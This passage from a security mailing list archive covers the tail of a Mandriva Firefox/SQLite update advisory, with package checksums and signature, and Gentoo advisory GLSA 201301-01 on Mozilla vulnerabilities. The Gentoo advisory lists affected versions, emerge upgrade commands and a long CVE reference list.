mes5/x86_64/firefox-nl-3.6.17-0.1mdvmes5.2.x86_64.rpm b2a0f77c3a5f144fd9b13e6e18b5668d mes5/x86_64/firefox-nn_NO-3.6.17-0.1mdvmes5.2.x86_64.rpm 459caa344929122196f40a0b03aaa77f mes5/x86_64/firefox-oc-3.6.17-0.1mdvmes5.2.x86_64.rpm 7acc021757df45d4c9a3f0adf5058f4e mes5/x86_64/firefox-pa_IN-3.6.17-0.1mdvmes5.2.x86_64.rpm 4c415b9549be3c5b901a18a751e72e7e mes5/x86_64/firefox-pl-3.6.17-0.1mdvmes5.2.x86_64.rpm b7410e6f949e2e167b6a5ffa13f1d5a4 mes5/x86_64/firefox-pt_BR-3.6.17-0.1mdvmes5.2.x86_64.rpm 43cc010a9f8b133adac9a4eb5fd111f7 mes5/x86_64/firefox-pt_PT-3.6.17-0.1mdvmes5.2.x86_64.rpm 04ed29a15e51451cfa4122eb7c4ada8e mes5/x86_64/firefox-ro-3.6.17-0.1mdvmes5.2.x86_64.rpm c5f071ad5734fc69ed6187ae9f92e72d mes5/x86_64/firefox-ru-3.6.17-0.1mdvmes5.2.x86_64.rpm 7bb7fd81e876495f4ae7ab30da0f9ae4 mes5/x86_64/firefox-si-3.6.17-0.1mdvmes5.2.x86_64.rpm 975dcd619280dbcf17b55d538f01e93e mes5/x86_64/firefox-sk-3.6.17-0.1mdvmes5.2.x86_64.rpm d8e4dfe5ffb9bfc49709b60e7fbf2c92 mes5/x86_64/firefox-sl-3.6.17-0.1mdvmes5.2.x86_64.rpm 1b33061a688a563053bcd50bc4449db1 mes5/x86_64/firefox-sq-3.6.17-0.1mdvmes5.2.x86_64.rpm 5fef483a4f5e020021c2cd4e34749ab7 mes5/x86_64/firefox-sr-3.6.17-0.1mdvmes5.2.x86_64.rpm 6e21f7add5864e8ee26dc8a744fdc30b mes5/x86_64/firefox-sv_SE-3.6.17-0.1mdvmes5.2.x86_64.rpm e86770d480ecd52ed6ee2eeae6f6d24b mes5/x86_64/firefox-te-3.6.17-0.1mdvmes5.2.x86_64.rpm 24a6cd92245b7c16404059228dee56a1 mes5/x86_64/firefox-th-3.6.17-0.1mdvmes5.2.x86_64.rpm fc97ff214f1fd47aa3d270a20c238913 mes5/x86_64/firefox-tr-3.6.17-0.1mdvmes5.2.x86_64.rpm 6d665853c2345607b932f836eeb9ab8a mes5/x86_64/firefox-uk-3.6.17-0.1mdvmes5.2.x86_64.rpm afa7c5c1bc9aec01733382e300770e61 mes5/x86_64/firefox-zh_CN-3.6.17-0.1mdvmes5.2.x86_64.rpm 8bb13a84c1efabc7baf94143e3a78364 mes5/x86_64/firefox-zh_TW-3.6.17-0.1mdvmes5.2.x86_64.rpm b7a1511c5b7ff2d910fb8fa306a9fb50 mes5/x86_64/gnome-python-extras-2.19.1-20.27mdvmes5.2.x86_64.rpm e2df82f36fb325df0797b18847dbb1a5 mes5/x86_64/gnome-python-gda-2.19.1-20.27mdvmes5.2.x86_64.rpm 8253a637a23efef6c15c552b9b0a3459 mes5/x86_64/gnome-python-gda-devel-2.19.1-20.27mdvmes5.2.x86_64.rpm 2a6a42257bc206b8c373315808f89a11 mes5/x86_64/gnome-python-gdl-2.19.1-20.27mdvmes5.2.x86_64.rpm 407ab79e0a50b3c361c528ad0381dc0a mes5/x86_64/gnome-python-gtkhtml2-2.19.1-20.27mdvmes5.2.x86_64.rpm 214a324b266e552e2393e31be905fec0 mes5/x86_64/gnome-python-gtkmozembed-2.19.1-20.27mdvmes5.2.x86_64.rpm f00814fd166c6173473923145f7edb09 mes5/x86_64/gnome-python-gtkspell-2.19.1-20.27mdvmes5.2.x86_64.rpm fb5f99420187bd9d38fca89a3c296779 mes5/x86_64/lemon-3.7.4-0.1mdvmes5.2.x86_64.rpm 5b84fb55152b544c80660e96a1ec63c8 mes5/x86_64/lib64sqlite3_0-3.7.6.2-0.1mdvmes5.2.x86_64.rpm 1e399ecae3c9de83bc4d4f2a91a74dfb mes5/x86_64/lib64sqlite3-devel-3.7.6.2-0.1mdvmes5.2.x86_64.rpm aea22ba2c95d994dd25bd9433aa93bd1 mes5/x86_64/lib64sqlite3-static-devel-3.7.6.2-0.1mdvmes5.2.x86_64.rpm 13bce11c19e821c3d7c2f4cdc1ab402f mes5/x86_64/lib64xulrunner1.9.2.17-1.9.2.17-0.1mdvmes5.2.x86_64.rpm 8a3ca64ce81aadbdd2ecb3a398570762 mes5/x86_64/lib64xulrunner-devel-1.9.2.17-0.1mdvmes5.2.x86_64.rpm 437b579498eb505c806cee54a61abca7 mes5/x86_64/sqlite3-tools-3.7.6.2-0.1mdvmes5.2.x86_64.rpm e29899f953d34097cb5c8679dd7775df mes5/x86_64/xulrunner-1.9.2.17-0.1mdvmes5.2.x86_64.rpm 93bd94819b0b98ead5f8eb7b00bf8703 mes5/x86_64/yelp-2.24.0-3.28mdvmes5.2.x86_64.rpm 08e3395dcf5d79aad887b04fccbeca1a mes5/SRPMS/firefox-3.6.17-0.1mdvmes5.2.src.rpm ace71a7037acfef2e442c0f1d472a558 mes5/SRPMS/firefox-l10n-3.6.17-0.1mdvmes5.2.src.rpm f625973d73bdc2c483e16d69d86ed015 mes5/SRPMS/gnome-python-extras-2.19.1-20.27mdvmes5.2.src.rpm 5e72aa3d556fbaadb3feba514417c97f mes5/SRPMS/lemon-3.7.4-0.1mdvmes5.2.src.rpm 42a930801375eab6b2532bbe97f2938d mes5/SRPMS/sqlite3-3.7.6.2-0.1mdvmes5.2.src.rpm 6e2762193b3083bdc03e89d638c1ca59 mes5/SRPMS/xulrunner-1.9.2.17-0.1mdvmes5.2.src.rpm a0115bd0847187c4a21ded2734c2567a mes5/SRPMS/yelp-2.24.0-3.28mdvmes5.2.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team <security*mandriva.com> -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFNu9bfmqjQ0CJFipgRAjj2AJ4iav3EMP5XoLEC8nisesrJPy7FSgCeJ9JX uo5K88YBkyVTJhsEYpwVsxA= =nlH5 -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201301-01 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: Mozilla Products: Multiple vulnerabilities Date: January 08, 2013 Bugs: #180159, #181361, #207261, #238535, #246602, #251322, #255221, #255234, #255687, #257577, #260062, #261386, #262704, #267234, #273918, #277752, #280226, #280234, #280393, #282549, #284439, #286721, #290892, #292034, #297532, #305689, #307045, #311021, #312361, #312645, #312651, #312675, #312679, #312763, #313003, #324735, #326341, #329279, #336396, #341821, #342847, #348316, #357057, #360055, #360315, #365323, #373595, #379549, #381245, #388045, #390771, #395431, #401701, #403183, #404437, #408161, #413657, #419917, #427224, #433383, #437780, #439586, #439960, #444318 ID: 201301-01 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been found in Mozilla Firefox, Thunderbird, SeaMonkey, NSS, GNU IceCat, and XULRunner, some of which may allow execution of arbitrary code or local privilege escalation. Background ========== Mozilla Firefox is an open-source web browser and Mozilla Thunderbird an open-source email client, both from the Mozilla Project. The SeaMonkey project is a community effort to deliver production-quality releases of code derived from the application formerly known as the 'Mozilla Application Suite'. XULRunner is a Mozilla runtime package that can be used to bootstrap XUL+XPCOM applications such as Firefox and Thunderbird. NSS is Mozilla's Network Security Services library that implements PKI support. IceCat is the GNU version of Firefox. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 www-client/firefox < 10.0.11 >= 10.0.11 2 www-client/firefox-bin < 10.0.11 >= 10.0.11 3 mail-client/thunderbird < 10.0.11 >= 10.0.11 4 mail-client/thunderbird-bin < 10.0.11 >= 10.0.11 5 www-client/seamonkey < 2.14-r1 >= 2.14-r1 6 www-client/seamonkey-bin < 2.14 >= 2.14 7 dev-libs/nss < 3.14 >= 3.14 8 www-client/mozilla-firefox <= 3.6.8 Vulnerable! 9 www-client/mozilla-firefox-bin <= 3.5.6 Vulnerable! 10 mail-client/mozilla-thunderbird <= 3.0.4-r1 Vulnerable! 11 mail-client/mozilla-thunderbird-bin <= 3.0 Vulnerable! 12 www-client/icecat <= 10.0-r1 Vulnerable! 13 net-libs/xulrunner <= 2.0-r1 Vulnerable! 14 net-libs/xulrunner-bin <= 1.8.1.19 Vulnerable! ------------------------------------------------------------------- NOTE: Certain packages are still vulnerable. Users should migrate to another package if one is available or wait for the existing packages to be marked stable by their architecture maintainers. ------------------------------------------------------------------- 14 affected packages Description =========== Multiple vulnerabilities have been discovered in Mozilla Firefox, Thunderbird, SeaMonkey, NSS, GNU IceCat, and XULRunner. Please review the CVE identifiers referenced below for details. Impact ====== A remote attacker could entice a user to view a specially crafted web page or email, possibly resulting in execution of arbitrary code or a Denial of Service condition. Furthermore, a remote attacker may be able to perform Man-in-the-Middle attacks, obtain sensitive information, bypass restrictions and protection mechanisms, force file downloads, conduct XML injection attacks, conduct XSS attacks, bypass the Same Origin Policy, spoof URL's for phishing attacks, trigger a vertical scroll, spoof the location bar, spoof an SSL indicator, modify the browser's font, conduct clickjacking attacks, or have other unspecified impact. A local attacker could gain escalated privileges, obtain sensitive information, or replace an arbitrary downloaded file. Workaround ========== There is no known workaround at this time. Resolution ========== All Mozilla Firefox users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=www-client/firefox-10.0.11" All users of the Mozilla Firefox binary package should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=www-client/firefox-bin-10.0.11"= All Mozilla Thunderbird users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot -v ">=mail-client/thunderbird-10.0.11" All users of the Mozilla Thunderbird binary package should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot -v ">=mail-client/thunderbird-bin-10.0.11" All Mozilla SeaMonkey users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=www-client/seamonkey-2.14-r1" All users of the Mozilla SeaMonkey binary package should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=www-client/seamonkey-bin-2.14" All NSS users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=dev-libs/nss-3.14" The "www-client/mozilla-firefox" package has been merged into the "www-client/firefox" package. To upgrade, please unmerge "www-client/mozilla-firefox" and then emerge the latest "www-client/firefox" package: # emerge --sync # emerge --unmerge "www-client/mozilla-firefox" # emerge --ask --oneshot --verbose ">=www-client/firefox-10.0.11" The "www-client/mozilla-firefox-bin" package has been merged into the "www-client/firefox-bin" package. To upgrade, please unmerge "www-client/mozilla-firefox-bin" and then emerge the latest "www-client/firefox-bin" package: # emerge --sync # emerge --unmerge "www-client/mozilla-firefox-bin" # emerge --ask --oneshot --verbose ">=www-client/firefox-bin-10.0.11"= The "mail-client/mozilla-thunderbird" package has been merged into the "mail-client/thunderbird" package. To upgrade, please unmerge "mail-client/mozilla-thunderbird" and then emerge the latest "mail-client/thunderbird" package: # emerge --sync # emerge --unmerge "mail-client/mozilla-thunderbird" # emerge --ask --oneshot -v ">=mail-client/thunderbird-10.0.11" The "mail-client/mozilla-thunderbird-bin" package has been merged into the "mail-client/thunderbird-bin" package. To upgrade, please unmerge "mail-client/mozilla-thunderbird-bin" and then emerge the latest "mail-client/thunderbird-bin" package: # emerge --sync # emerge --unmerge "mail-client/mozilla-thunderbird-bin" # emerge --ask --oneshot -v ">=mail-client/thunderbird-bin-10.0.11" Gentoo discontinued support for GNU IceCat. We recommend that users unmerge GNU IceCat: # emerge --unmerge "www-client/icecat" Gentoo discontinued support for XULRunner. We recommend that users unmerge XULRunner: # emerge --unmerge "net-libs/xulrunner" Gentoo discontinued support for the XULRunner binary package. We recommend that users unmerge XULRunner: # emerge --unmerge "net-libs/xulrunner-bin" References ========== [ 1 ] CVE-2011-3101 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3101 [ 2 ] CVE-2007-2436 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-2436 [ 3 ] CVE-2007-2437 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-2437 [ 4 ] CVE-2007-2671 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-2671 [ 5 ] CVE-2007-3073 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-3073 [ 6 ] CVE-2008-0016 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-0016 [ 7 ] CVE-2008-0017 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-0017 [ 8 ] CVE-2008-0367 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-0367 [ 9 ] CVE-2008-3835 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-3835 [ 10 ] CVE-2008-3836 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-3836 [ 11 ] CVE-2008-3837 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-3837 [ 12 ] CVE-2008-4058 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4058 [ 13 ] CVE-2008-4059 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4059 [ 14 ] CVE-2008-4060 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4060 [ 15 ] CVE-2008-4061 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4061 [ 16 ] CVE-2008-4062 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4062 [ 17 ] CVE-2008-4063 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4063 [ 18 ] CVE-2008-4064 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4064 [ 19 ] CVE-2008-4065 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4065 [ 20 ] CVE-2008-4066 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4066 [ 21 ] CVE-2008-4067 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4067 [ 22 ] CVE-2008-4068 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4068 [ 23 ] CVE-2008-4069 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4069 [ 24 ] CVE-2008-4070 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4070 [ 25 ] CVE-2008-4582 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4582 [ 26 ] CVE-2008-5012 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5012 [ 27 ] CVE-2008-5013 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5013 [ 28 ] CVE-2008-5014 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5014 [ 29 ] CVE-2008-5015 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5015 [ 30 ] CVE-2008-5016 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5016 [ 31 ] CVE-2008-5017 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5017 [ 32 ] CVE-2008-5018 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5018 [ 33 ] CVE-2008-5019 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5019 [ 34 ] CVE-2008-5021 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5021 [ 35 ] CVE-2008-5022 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5022 [ 36 ] CVE-2008-5023 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5023 [ 37 ] CVE-2008-5024 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5024 [ 38 ] CVE-2008-5052 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5052 [ 39 ] CVE-2008-5500 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5500 [ 40 ] CVE-2008-5501 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5501 [ 41 ] CVE-2008-5502 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5502 [ 42 ] CVE-2008-5503 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5503 [ 43 ] CVE-2008-5504 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5504 [ 44 ] CVE-2008-5505 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5505 [ 45 ] CVE-2008-5506 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5506 [ 46 ] CVE-2008-5507 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5507 [ 47 ] CVE-2008-5508 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5508 [ 48 ] CVE-2008-5510 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5510 [ 49 ] CVE-2008-5511 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5511 [ 50 ] CVE-2008-5512 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5512 [ 51 ] CVE-2008-5513 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5513 [ 52 ] CVE-2008-5822 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5822 [ 53 ] CVE-2008-5913 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5913 [ 54 ] CVE-2008-6961 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-6961 [ 55 ] CVE-2009-0071 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0071 [ 56 ] CVE-2009-0071 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0071 [ 57 ] CVE-2009-0352 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0352 [ 58 ] CVE-2009-0353 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0353 [ 59 ] CVE-2009-0354 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0354 [ 60 ] CVE-2009-0355 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0355 [ 61 ] CVE-2009-0356 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0356 [ 62 ] CVE-2009-0357 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0357 [ 63 ] CVE-2009-0358 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0358 [ 64 ] CVE-2009-0652 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0652 [ 65 ] CVE-2009-0771 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0771 [ 66 ] CVE-2009-0772 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0772 [ 67 ] CVE-2009-0773 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0773 [ 68 ] CVE-2009-0774 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0774 [ 69 ] CVE-2009-0775 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0775 [ 70 ] CVE-2009-0776 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0776 [ 71 ] CVE-2009-0777 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0777 [ 72 ] CVE-2009-1044 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1044 [ 73 ] CVE-2009-1169 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1169 [ 74 ] CVE-2009-1302 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1302 [ 75 ] CVE-2009-1303 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1303 [ 76 ] CVE-2009-1304 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1304 [ 77 ] CVE-2009-1305 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1305 [ 78 ] CVE-2009-1306 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1306 [ 79 ] CVE-2009-1307 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1307 [ 80 ] CVE-2009-1308 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1308 [ 81 ] CVE-2009-1309 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1309 [ 82 ] CVE-2009-1310 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1310 [ 83 ] CVE-2009-1311 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1311 [ 84 ] CVE-2009-1312 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1312 [ 85 ] CVE-2009-1313 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1313 [ 86 ] CVE-2009-1392 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1392 [ 87 ] CVE-2009-1563 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1563 [ 88 ] CVE-2009-1571 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1571 [ 89 ] CVE-2009-1828 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1828 [ 90 ] CVE-2009-1832 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1832 [ 91 ] CVE-2009-1833 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1833 [ 92 ] CVE-2009-1834 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1834 [ 93 ] CVE-2009-1835 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1835 [ 94 ] CVE-2009-1836 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1836 [ 95 ] CVE-2009-1837 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1837 [ 96 ] CVE-2009-1838 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1838 [ 97 ] CVE-2009-1839 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1839 [ 98 ] CVE-2009-1840 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1840 [ 99 ] CVE-2009-1841 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1841 [ 100 ] CVE-2009-2043 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2043 [ 101 ] CVE-2009-2044 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2044 [ 102 ] CVE-2009-2061 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2061 [ 103 ] CVE-2009-2065 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2065 [ 104 ] CVE-2009-2210 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2210 [ 105 ] CVE-2009-2404 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2404 [ 106 ] CVE-2009-2408 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2408 [ 107 ] CVE-2009-2462 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2462 [ 108 ] CVE-2009-2463 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2463 [ 109 ] CVE-2009-2464 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2464 [ 110 ] CVE-2009-2465 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2465 [ 111 ] CVE-2009-2466 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2466 [ 112 ] CVE-2009-2467 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2467 [ 113 ] CVE-2009-2469 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2469 [ 114 ] CVE-2009-2470 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2470 [ 115 ] CVE-2009-2471 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2471 [ 116 ] CVE-2009-2472 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2472 [ 117 ] CVE-2009-2477 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2477 [ 118 ] CVE-2009-2478 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2478 [ 119 ] CVE-2009-2479 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2479 [ 120 ] CVE-2009-2535 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2535 [ 121 ] CVE-2009-2654 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2654 [ 122 ] CVE-2009-2662 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2662 [ 123 ] CVE-2009-2664 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2664 [ 124 ] CVE-2009-2665 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2665 [ 125 ] CVE-2009-3069 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3069 [ 126 ] CVE-2009-3070 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3070 [ 127 ] CVE-2009-3071 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3071 [ 128 ] CVE-2009-3072 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3072 [ 129 ] CVE-2009-3074 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3074 [ 130 ] CVE-2009-3075 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3075 [ 131 ] CVE-2009-3076 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3076 [ 132 ] CVE-2009-3077 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3077 [ 133 ] CVE-2009-3078 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3078 [ 134 ] CVE-2009-3079 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3079 [ 135 ] CVE-2009-3274 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3274 [ 136 ] CVE-2009-3371 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3371 [ 137 ] CVE-2009-3372 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3372 [ 138 ] CVE-2009-3373 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3373 [ 139 ] CVE-2009-3374 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3374 [ 140 ] CVE-2009-3375 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3375 [ 141 ] CVE-2009-3376 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3376 [ 142 ] CVE-2009-3377 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3377 [ 143 ] CVE-2009-3378 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3378 [ 144 ] CVE-2009-3379 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3379 [ 145 ] CVE-2009-3380 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3380 [ 146 ] CVE-2009-3381 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3381 [ 147 ] CVE-2009-3382 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3382 [ 148 ] CVE-2009-3383 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3383 [ 149 ] CVE-2009-3388 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3388 [ 150 ] CVE-2009-3389 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3389 [ 151 ] CVE-2009-3555 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3555 [ 152 ] CVE-2009-3978 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3978 [ 153 ] CVE-2009-3979 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3979 [ 154 ] CVE-2009-3980 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3980 [ 155 ] CVE-2009-3981 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3981 [ 156 ] CVE-2009-3982 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3982 [ 157 ] CVE-2009-3983 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3983 [ 158 ] CVE-2009-3984 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3984 [ 159 ] CVE-2009-3985 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3985 [ 160 ] CVE-2009-3986 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3986 [ 161 ] CVE-2009-3987 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3987 [ 162 ] CVE-2009-3988 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3988 [ 163 ] CVE-2010-0159 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0159 [ 164 ] CVE-2010-0160 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0160 [ 165 ] CVE-2010-0162 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0162 [ 166 ] CVE-2010-0163 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0163 [ 167 ] CVE-2010-0164 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0164 [ 168 ] CVE-2010-0165 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0165 [ 169 ] CVE-2010-0166 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0166 [ 170 ] CVE-2010-0167 